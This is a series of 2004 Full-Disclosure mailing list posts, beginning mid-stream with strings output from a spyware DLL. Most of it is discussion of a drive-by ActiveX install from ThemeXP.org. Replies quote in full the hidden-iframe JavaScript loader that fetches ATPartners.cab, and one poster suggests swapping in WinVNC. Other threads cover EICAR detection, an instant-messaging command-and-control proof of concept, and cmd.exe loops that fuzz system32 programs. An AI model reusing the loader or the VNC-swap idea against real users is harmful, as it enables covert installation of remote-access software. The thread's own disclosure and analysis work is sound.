ATPartners.dll,,,34

[RegDlls]
11,,ATPartners.dll, 1

[DestinationDirs]
CopySystemFiles=11

[RegisterOCXSection]
"%11%\ATPartners.dll"

[RegistryEntries]

[SourceDisksNames]
1="CAB File",,,
<cruncher:~/jpegs >file
ATPartners.dll
[ 3:25AM]
ATPartners.dll: MS-DOS executable (EXE), OS/2 or MS Windows
<cruncher:~/jpegs > strings ATPartners.dll

<-- Garbage cut -->

        F1.Organizer.1 = s 'F1 Organizer Class'
                CLSID = s '{00000EF1-0786-4633-87C6-1AA7A44296DA}'
        F1.Organizer = s 'F1 Organizer Class'
                CLSID = s '{00000EF1-0786-4633-87C6-1AA7A44296DA}'
                CurVer = s 'F1.Organizer.1'
        NoRemove CLSID
                ForceRemove {00000EF1-0786-4633-87C6-1AA7A44296DA} = s
'F1 Organizer Class'
                        ProgID = s 'F1.Organizer.1'
                        VersionIndependentProgID = s 'F1.Organizer'
                        ForceRemove 'Programmable'
                        InprocServer32 = s '%MODULE%'
                        {
                                val ThreadingModel = s 'Apartment'
                        }
                        'TypeLib' = s
'{EF100007-F409-426a-9E7C-CB211F2A9786}'
MSFT
.....
OLEAUT32.dll
USER32.dll
WININET.dll
LoadLibraryA
GetProcAddress
RegCloseKey
SaveDC
CoTaskMemFree
GetDC
InternetOpenA
F1.DLL
DllCanUnloadNow
DllGetClassObject
DllRegisterServer
DllUnregisterServer
<cruncher:~/jpegs >

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box

From: GuidoZ (uberguidozgmail.com)
Date: Tue Oct 05 2004 - 01:27:46 CDT

Bingo - that's what I found too. The javascript is what does the dirty work.

--
Peace. ~G

On Mon, 04 Oct 2004 09:55:19 -0500, Willem Koenings <iseceurope.com> wrote:
>
> hi,
>
> > I was unable to verify it, since I don't use IE, and would prefer not
> > infecting myself on accident, however I did run across this:
> >
> > http://themexp.org/about_wrap.php
> >
> > Perhaps one of the themes you downloaded was bundled with the spyware?
>
> two tiny links from there:
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
> http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab
>
> W.
>
> --
> ___________________________________________________________
> Sign-up for Ads Free at Mail.com
> http://promo.mail.com/adsfreejump.htm
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] [suse-security] Anti-Virus Problem

From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Tue Oct 05 2004 - 02:38:43 CDT

Dear Björn Scorey,

It's expected behaviour. EICAR is executable file and eicar string
should only be detected in the beginning of the file.

--Monday, October 4, 2004, 9:33:18 PM, you wrote to full-disclosurelists.netsys.com:

BS> Hi Everyone !

BS> I am running Suse 9.0 and I have installed 

BS> qmail (netqmail  Ver. 1.05)
BS> amavis (amavis-new Ver. 20030616p5-23)
BS> antivir (Ver 2.08-16) 

BS> Antivir seems to be an evaluation version. (The one that came with Suse 9.0) 

BS> I donwloaded the EICAR E-Mail Test Virus but when I send either
BS> an infected attachment or simply copy the virus string on the mail,
BS> the antivirus doesn't recognize the virus, and the mail passes
BS> normally. 

BS> However when I run antivir on the infected file (attachment) by
BS> itself, it recognizes the virus. The same occured with f-prot
BS> (however I got some minor errors while installing f-prot). When I
BS> run either anti-virus scanner on my mailbox (mbox), none of them
BS> manage to see the virus. 

BS> Anyone has an idea what's wrong ? 

BS> Regards
BS> Björn

--
~/ZARAZA
Êëÿíóñü ëûñèíîé ïðîðîêà Ìîèñåÿ - ÿ òåáÿ ñåé÷àñ ñúåì. (Òâåí)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] nmapbot: using instant messaging as a remote administration tool

From: Abe Usher (abe.ushersharp-ideas.net)
Date: Mon Oct 04 2004 - 23:46:46 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I've created a small proof of concept named "nmapbot" that shows it is
possible to use instant messaging as a platform for remote command and
control of computer systems.

Purpose:
- --------
To create a semi-intelligent security bot that uses instant messaging as
a platform for receiving commands and returning results.

Method:
- -------
Using Python, the AOL TOC protocol, Bayesian language processing, and
nmap 3.70, I hacked together a little bot that can run nmap and ping.
Future editions will include additional commands =)

The nmapbot rests squarely on the shoulders of python and projects such
as Py-AIML, AIMLBayes, GrokItBot, and Reverend. Many thanks to fyodor
et al. for the excellent tool suite in nmap 3.70.

If you are interested, you can find source code and documentation for
nmap bot at:
http://www.sharp-ideas.net

Cheers,
Abe Usher, CISSP

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBYic2T3X9miqOcSQRAtLuAJ9V6yH+aHzs4tRPvVIQhu9jGuDXkQCdEUCZ
g33XB8OYyWljCuCNPr1fpe8=
=Gg0O
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Test your windows OS

From: Steve Wray (stevemyself.gen.nz)
Date: Mon Oct 04 2004 - 23:10:48 CDT

Berend-Jan Wever wrote:
> Hi all,
>
> Wanna do a quick test to see if the programmers that wrote your windows operating system have any clue as to what there doing ? Run these commands from cmd.exe in the system32 directory:
>
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as much "A"-s as cmd.exe allows on one line.)
>
> Each command will execute every program in your system32 directory, most of them will either ignore the parameter or report an error because the parameter doesn't make sence... But on my win2k system I found 6 programs vulnerable to these very simple formatsting and BoF tests.... grpconv even gives EIP 0x00410041, can it be any easier?
>
> These are not vulnerabilities in itself: you cannot gain access or elevate priviledges but I just wanted to let you know that these programmers did a sloppy job.

Fascinating; you've rediscovered one of the first vulnerability checks
ever devised!
:-)

You (and the rest of the list; everyone who hasn't already) should read
'The Unix Haters Handbook' (amusingly enough I find this online copy at
Microsoft http://research.microsoft.com/~daniel/uhh-download.html but it
is *not* a Microsoft book; its way older than MS (IIRC)).

 From O'Reilly& "Practical UNIX and Internet Security" chapter 27;

"Recall that the first study by Professor Barton Miller, cited in
Chapter 23, found that more than one-third of common programs supplied
by several UNIX vendors crashed or hung when they were tested with a
trivial program that generated random input. Five years later, he reran
the tests. The results? Although most vendors had improved to where
"only" one-fourth of the programs crashed, one vendor's software
exhibited a 46% failure rate! This failure rate was despite wide
circulation and publication of the report, and despite the fact that
Miller's team made the test code available for free to vendors.

Most frightening, the testing performed by Miller's group is one of the
simplest, least-effective forms of testing that can be performed
(random, black-box testing). Do vendors do any reasonable testing at all?"

Oh in fact I can now do better than that;
I found this snippet;

http://www.llnl.gov/CASC/calendar/miller.061200.html

where Miller says;
"This year (2000), we took another stab at random testing, this time
testing applications running on Windows/NT . Given valid random mouse
and keyboard input streams, we could crash or hang 45% of these
applications."

So yeah, its a very valid technique you describe there, good results!

> Cheers,
> SkyLined
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: GuidoZ (uberguidozgmail.com)
Date: Tue Oct 05 2004 - 01:37:24 CDT

Something else that I noticed - the AffilateID is encoded.
Decoding reveals this: +A0,J}h:B6^;9gy>7ue-}hx

Doesn't seem to really be important, but maybe useful when porting the
script. Those that would like to do such a thing should understand. ;)

--
Peace. ~G

On Mon, 4 Oct 2004 10:15:46 -0500 (CDT), Gossi The Dog
<gossiabate.veritynet.net> wrote:
> Yes... ThemeXP.org has this in the HTML..
>
> <!-- AUTO_PROMPT AD START --><script language="JavaScript"
> type="text/JavaScript
> "
> src="http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js"></script>
> <!-- AUTO_PROMPT AD END -->
>
> Which calls...
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
>
> Which contains...
>
> document.write('<iframe id="downloads_manager"
> style="position:a
> bsolute;visibility:hidden;"></iframe>');
>
> document_code = '<html><head>\n';
> document_code += '<\/head><body>\n';
> document_code += '<object onerror="window.parent.retry();"
> id="DDo
> wnload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
> codebase="http:
> //www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0
> WIDTH=0><PARAM
> NAME="AffiliateID"
> VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n
> ';
> document_code += '<\/body><\/html>';
> downloads_manager.document.write(document_code);
> downloads_manager.document.close();
>
> setCookie('minpopup80wu03rd','test',1);
>
> ...which downloads http:
> //www.addictivetechnologies.net/DM0/cab/ATPartners.cab
>
> ...which means those using shitty MS browsers get owned, again.
>
> If you want a laugh, replace the CAB files which WinVNC or somesuch.
>
> --g

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: GuidoZ (uberguidozgmail.com)
Date: Tue Oct 05 2004 - 01:33:11 CDT

> If you want a laugh, replace the CAB files which WinVNC or somesuch.

Intriguing indeed. However, you'll want to make a CAB file out of it,
not just an EXE. The CLSID and install params are for CABs. Not to
difficult to do though with a little Google hunting and some time. =)

--
Peace ~G

On Mon, 4 Oct 2004 10:15:46 -0500 (CDT), Gossi The Dog
<gossiabate.veritynet.net> wrote:
> Yes... ThemeXP.org has this in the HTML..
>
> <!-- AUTO_PROMPT AD START --><script language="JavaScript"
> type="text/JavaScript
> "
> src="http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js"></script>
> <!-- AUTO_PROMPT AD END -->
>
> Which calls...
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
>
> Which contains...
>
> document.write('<iframe id="downloads_manager"
> style="position:a
> bsolute;visibility:hidden;"></iframe>');
>
> document_code = '<html><head>\n';
> document_code += '<\/head><body>\n';
> document_code += '<object onerror="window.parent.retry();"
> id="DDo
> wnload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
> codebase="http:
> //www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0
> WIDTH=0><PARAM
> NAME="AffiliateID"
> VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n
> ';
> document_code += '<\/body><\/html>';
> downloads_manager.document.write(document_code);
> downloads_manager.document.close();
>
> setCookie('minpopup80wu03rd','test',1);
>
> ...which downloads http:
> //www.addictivetechnologies.net/DM0/cab/ATPartners.cab
>
> ...which means those using shitty MS browsers get owned, again.
>
> If you want a laugh, replace the CAB files which WinVNC or somesuch.
>
> --g
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] nmapbot: using instant messaging as a remote administration tool

From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Tue Oct 05 2004 - 04:49:02 CDT

Dear Abe Usher,

There is at least 1 Miranda plugin (nRemX) for remote command execution
via different IM protocols.

--Tuesday, October 5, 2004, 8:46:46 AM, you wrote to full-disclosurelists.netsys.com:

AU> -----BEGIN PGP SIGNED MESSAGE-----
AU> Hash: SHA1

AU> I've created a small proof of concept named "nmapbot" that shows it is
AU> possible to use instant messaging as a platform for remote command and
AU> control of computer systems.

AU> Purpose:
AU> - --------
AU> To create a semi-intelligent security bot that uses instant messaging as
AU> a platform for receiving commands and returning results.

AU> Method:
AU> - -------
AU> Using Python, the AOL TOC protocol, Bayesian language processing, and
AU> nmap 3.70, I hacked together a little bot that can run nmap and ping.
AU> Future editions will include additional commands =)

AU> The nmapbot rests squarely on the shoulders of python and projects such
AU> as Py-AIML, AIMLBayes, GrokItBot, and Reverend. Many thanks to fyodor
AU> et al. for the excellent tool suite in nmap 3.70.

AU> If you are interested, you can find source code and documentation for
AU> nmap bot at:
AU> http://www.sharp-ideas.net

AU> Cheers,
AU> Abe Usher, CISSP

AU> -----BEGIN PGP SIGNATURE-----
AU> Version: GnuPG v1.2.4 (MingW32)
AU> Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

AU> iD8DBQFBYic2T3X9miqOcSQRAtLuAJ9V6yH+aHzs4tRPvVIQhu9jGuDXkQCdEUCZ
AU> g33XB8OYyWljCuCNPr1fpe8=
AU> =Gg0O
AU> -----END PGP SIGNATURE-----

AU> _______________________________________________
AU> Full-Disclosure - We believe in it.
AU> Charter: http://lists.netsys.com/full-disclosure-charter.html

--
~/ZARAZA
Íó à òåïåðü, Óèëüÿì, õîðîøåíüêî ïîðàçìûñëèòå íàä äàííûì ïèñüìîì. (Òâåí)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Test your windows OS

From: Vincent Archer (varcherdenyall.com)
Date: Tue Oct 05 2004 - 04:33:33 CDT

On Tue, Oct 05, 2004 at 05:10:48PM +1300, Steve Wray wrote:
> So yeah, its a very valid technique you describe there, good results!

Aeons ago, in the deep ages when the Macintosh first came out, there
was a small app which was called Monkey Test which did the same thing.
Generate continuous streams of random mouse, click and keyboard events.

An application was "crash proof" not if it didn't crash, but if it did
survive more than 5mn of that test.

--
Vincent ARCHER
varcherdenyall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Alla Bezroutchko (allascanit.be)
Date: Tue Oct 05 2004 - 06:00:41 CDT

Carr, Robert wrote:
> Interesting...
>
> I just went there, and he's right. Atpartners.cab installed without
> permission. My McAfee picked it right up as Atpartners.dll, downloaded
> to Temp Internet files. Spyware detected as NetPals. On the other hand,
> I'm admin of my machine, I wonder if a "user" would get an error message
> about not having the correct rights...

I have tested it on Windows XP SP2 and on fully patched Windows 2000. In
both cases _nothing_ gets run or installed. Both systems are more or
less standard installations without any special IE hardening (except
patches).

When I surf to the site with Windows XP "Installing components...
ATpartners.cab" briefly appears in the status bar and then the site gets
displayed. Under the normal browser bars there is a message saying "The
site might require the following ActiveX control: FREE on-line games and
special offers from... Click here to install...". I don't click on it.
Searching the disk for atpartnets.cab or atpartners.dll finds nothing.
The CLSID of the ActiveX control only appears in the registry in
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\".

With Windows 2000 I also get "Installing components... ATpartners.cab"
in the status bar and then the dialog box asking if I want to install
"Free online games from ATgames.com". This is a usual dialog box you get
when a page attempts to install an ActiveX control. If I click "No",
nothing gets installed, no atpartners files on the file system, no
traces of the CLSID in the registry.

I suppose the cab file gets downloaded so that Windows can read and
display the signature of the file. It does not get run or installed
unless explicitly permitted by user.

So, as far as I can see this is no 0-day.

Alla.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Hi

From: Scheidell (scheidellsecnap.net)
Date: Tue Oct 05 2004 - 08:39:10 CDT